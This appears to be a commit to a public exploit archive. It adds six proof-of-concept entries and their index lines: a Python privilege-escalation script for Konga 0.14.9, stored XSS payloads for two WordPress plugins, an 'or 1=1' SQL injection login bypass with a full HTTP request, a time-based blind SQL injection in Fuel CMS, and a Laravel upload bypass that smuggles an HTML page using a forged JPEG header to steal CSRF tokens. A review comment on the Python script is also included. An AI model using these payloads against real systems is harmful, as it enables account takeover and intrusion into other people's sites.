DB: 2021-11-16
6 changes to exploits/shellcodes WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS) KONGA 0.14.9 - Privilege Escalation Simple Subscription Website 1.0 - SQLi Authentication Bypass Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated) WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated) PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
This commit is contained in:
parent
a7e24bac97
commit
412b034ee9
7 changed files with 227 additions and 0 deletions
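--- a/exploits/multiple/webapps/50521.py
+++ b/exploits/multiple/webapps/50521.py
@@ -0,0 +1,54 @@
+# Exploit Title: KONGA 0.14.9 - Privilege Escalation
+# Date: 10/11/2021
+# Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec)
+# Vendor Homepage: https://github.com/pantsel/konga
+# Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip
+# Version: 0.14.9
+# Tested on: Linux - Ubuntu 20.04.3 LTS (focal)
+
+
+
+import requests
+import json
+
+urlkonga = "http://www.example.com:1337/" # change to your konga address
+identifier = "usernormalkonga" # change user
+password = "changeme" # change password
+
+headers = {
+"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+"Content-Type": "application/json;charset=utf-8",
+"connection-id": "",
+"Origin": urlkonga,
+"Referer": urlkonga
+}
+
+url = urlkonga+"login"
+
+data = {
+"identifier":identifier,
+"password":password
+}
+
+response = requests.post(url, json=data)
+json_object = json.loads(response.text)
+print("[+] Attack")
+print("[+] Token " + json_object["token"])
+
+url2 = urlkonga+"api/user/"+str(json_object["user"]["id"])
+id = json_object["user"]["id"]
+print("[+] Exploiting User ID "+str(json_object["user"]["id"]))
+
+data2 = {
+"admin": "true",
+"passports": {
+"password": password,
+"protocol": "local"
+},
+"password_confirmation": password,
+"token":json_object["token"]
+}
+
+print("[+] Change Normal User to Admin")
+response2 = requests.put(url2, headers=headers, json=data2)
+print("[+] Success")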
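Review bot: `print("[+] Success")` on the last line is unconditional — neither `response.status_code` after the login POST nor `response2.status_code` after the PUT is checked, so the script reports success even when the server rejects the request, and a failed login surfaces as a bare `KeyError` at `json_object["token"]` instead of a readable message. `id = json_object["user"]["id"]` is assigned but never used and shadows the builtin `id`; the two later `str(json_object["user"]["id"])` expressions could use a differently named local instead. The file also carries no `# Description:` line, unlike the other entries in this commit; a one-sentence note on what the PUT to `api/user/<id>` with the normal user's own token demonstrates would help readers of the archive, and a `# CVE:` line if one exists.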
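--- a/exploits/php/webapps/50520.txt
+++ b/exploits/php/webapps/50520.txt
@@ -0,0 +1,31 @@
+# Exploit Title: WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)
+# Date: 20/08/2021
+# Exploit Author: Davide Taraschi
+# Vendor Homepage: https://wpschoolpress.com/
+# Software Link: https://wpschoolpress.com/free-download/
+# Version: up to 2.1.17 (non included)
+# Tested on: Ubuntu 20.04 over WordPress 5.8 and apache2
+# CVE : CVE-2021-24664
+
+# Description:
+The plugin sanitise some fields using a wordpress built-in function called sanitize_text_field() but does not correctly escape them before outputting in attributes, resulting in Stored Cross-Site Scripting issues.
+The function wp_sanitize_text_field() escape < and > but does not escape characters like ", allowing an attacker to break a HTML input tag and inject arbitrary javascript.
+
+# PoC:
+As admin,
+- Add a new teacher attendance (/wp-admin/admin.php?page=sch-teacherattendance), Tick the Absent box and put the following payload in the Reason: "style=animation-name:rotation onanimationstart=alert(/XSS/)//
+The XSS will be triggered when adding another teacher attendance by clicking on the Add button
+
+- Add a new Student Attendance (/wp-admin/admin.php?page=sch-attendance), tick the Absent box and put the following payload in the Reason: " style=animation-name:rotation onanimationstart=alert(/XSS/)//
+The XSS will be triggered when adding another attendance by clicking the 'Add/Update' button
+
+- Add a new Subject Mark Field (/wp-admin/admin.php?page=sch-settings&sc=subField) and put the following payload in the 'Field': " autofocus onfocus=alert(/XSS/)//
+The XSS will be triggered when editing the created Subject Mark (ie /admin.php?page=sch-settings&sc=subField&ac=edit&sid=3)
+
+- Create a new Subject (/wp-admin/admin.php?page=sch-subject), with the following payload in the Subject Name field: " autofocus onfocus=alert(/XSS/)//
+The XSS will be triggered when editing the Subject
+
+- Create a new Exam (/wp-admin/admin.php?page=sch-exams) with the following payload in the Exam Name Field: " autofocus onfocus=alert(/XSS/)//
+The XSS will be triggered when editing the Exam=20
+
+Note that some of this XSS issues can be executed by a teacher (medium-privileged user), but since wordpress uses HTTPonly cookies is impossible to steal cookies.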
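--- a/exploits/php/webapps/50522.txt
+++ b/exploits/php/webapps/50522.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass
+# Exploit Author: Daniel Haro (Dirox)
+# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
+# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
+# Version: Simple Subscription Website 1.0
+# Tested on: Windows, xampp
+# CVE: CVE-2021-43140
+
+- Description:
+SQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- -
+
+PoC:
+
+POST /plan_application/Actions.php?a=login HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 57
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/plan_application/admin/login.php
+Cookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3
+
+username=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-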
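--- a/exploits/php/webapps/50523.txt
+++ b/exploits/php/webapps/50523.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)
+# Date: 2021-04-11
+# Exploit Author: Rahad Chowdhury
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip
+# Version: 1.4.13
+# Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46
+
+Steps to Reproduce:
+1. At first login your panel
+2. then go to "Activity Log" menu
+3. then select any type option
+4. their "col" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "and (select * from(select(sleep(1)))a)" in "col=" parameter.
+
+POC:
+http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date
+and (select * from(select(sleep(1)))a)&fuel_inline=0
+
+Output:
+By issuing sleep(0) response will be delayed to 0 seconds.
+By issuing sleep(1) response will be delayed to 1 seconds.
+By issuing sleep(5) response will be delayed to 5 seconds.
+By issuing sleep(10) response will be delayed to 10 seconds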
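--- a/exploits/php/webapps/50524.txt
+++ b/exploits/php/webapps/50524.txt
@@ -0,0 +1,16 @@
+# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
+# Date: 11/11/2021
+# Exploit Author: Mohammed Aadhil Ashfaq
+# Vendor Homepage: https://form2email.dwbooster.com/
+# Version: 1.3.24
+# Tested on: wordpress
+
+POC
+1. Click Contact form to Email
+http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail
+2. Create new form name with <script>alert(1)</script>
+3. Click Publish
+4. XSS has been triggered
+http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687
+5. Open a different browser, logged in with wordpress. Copy the URL and
+Press enter. XSS will trigger.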
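--- a/exploits/php/webapps/50525.txt
+++ b/exploits/php/webapps/50525.txt
@@ -0,0 +1,69 @@
+# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
+# Date: 14/11/2021
+# Exploit Author: Hosein Vita
+# Vendor Homepage: https://laravel.com/
+# Software Link: https://laravel.com/docs/4.2
+# Version: Laravel Framework 8.70.1
+# Tested on: Windows/Linux
+
+# Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server
+# which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b
+
+# Steps to reproduce:
+1- Use HxD tool and add FF D8 FF E0 at the very begining of your file
+2- Use code below to bypass csrf token
+
+ÿØÿà<html>
+<head>
+<title>Laravel Csrf Bypass</title>
+</head>
+<body>
+<script>
+function submitFormWithTokenJS(token) {
+var xhr = new XMLHttpRequest();
+xhr.open("POST", POST_URL, true);
+
+// Send the proper header information along with the request
+xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+
+// This is for debugging and can be removed
+xhr.onreadystatechange = function() {
+if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
+console.log(xhr.responseText);
+}
+}
+//
+xhr.send("_token=" + token + "&desiredParameter=desiredValue");
+}
+
+function getTokenJS() {
+var xhr = new XMLHttpRequest();
+// This tels it to return it as a HTML document
+xhr.responseType = "document";
+// true on the end of here makes the call asynchronous
+//Edit the path as you want
+xhr.open("GET", "/image-upload", true);
+xhr.onload = function (e) {
+if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
+// Get the document from the response
+page = xhr.response
+// Get the input element
+input = page.getElementsByTagName("input")[0];
+// Show the token
+alert("The token is: " + input.value);
+// Use the token to submit the form
+submitFormWithTokenJS(input.value);
+}
+};
+// Make the request
+xhr.send(null);
+}
+getTokenJS();
+
+var POST_URL="/"
+getTokenJS();
+
+</script>
+</html>
+
+3- Save it as Html file and upload it.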
|
@ -44616,3 +44616,9 @@ id,file,description,date,author,type,platform,port
|
||||||
50514,exploits/php/webapps/50514.txt,"WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
|
50514,exploits/php/webapps/50514.txt,"WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
|
||||||
50515,exploits/php/webapps/50515.txt,"WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
|
50515,exploits/php/webapps/50515.txt,"WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
|
||||||
50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",1970-01-01,"Shain Lakin",webapps,multiple,
|
50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",1970-01-01,"Shain Lakin",webapps,multiple,
|
||||||
|
50520,exploits/php/webapps/50520.txt,"WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,"Davide Taraschi",webapps,php,
|
||||||
|
50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",1970-01-01,"Fabricio Salomao",webapps,multiple,
|
||||||
|
50522,exploits/php/webapps/50522.txt,"Simple Subscription Website 1.0 - SQLi Authentication Bypass",1970-01-01,"Daniel Haro",webapps,php,
|
||||||
|
50523,exploits/php/webapps/50523.txt,"Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
|
||||||
|
50524,exploits/php/webapps/50524.txt,"WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Mohammed Aadhil Ashfaq",webapps,php,
|
||||||
|
50525,exploits/php/webapps/50525.txt,"PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)",1970-01-01,"Hosein Vita",webapps,php,
|
||||||
|
|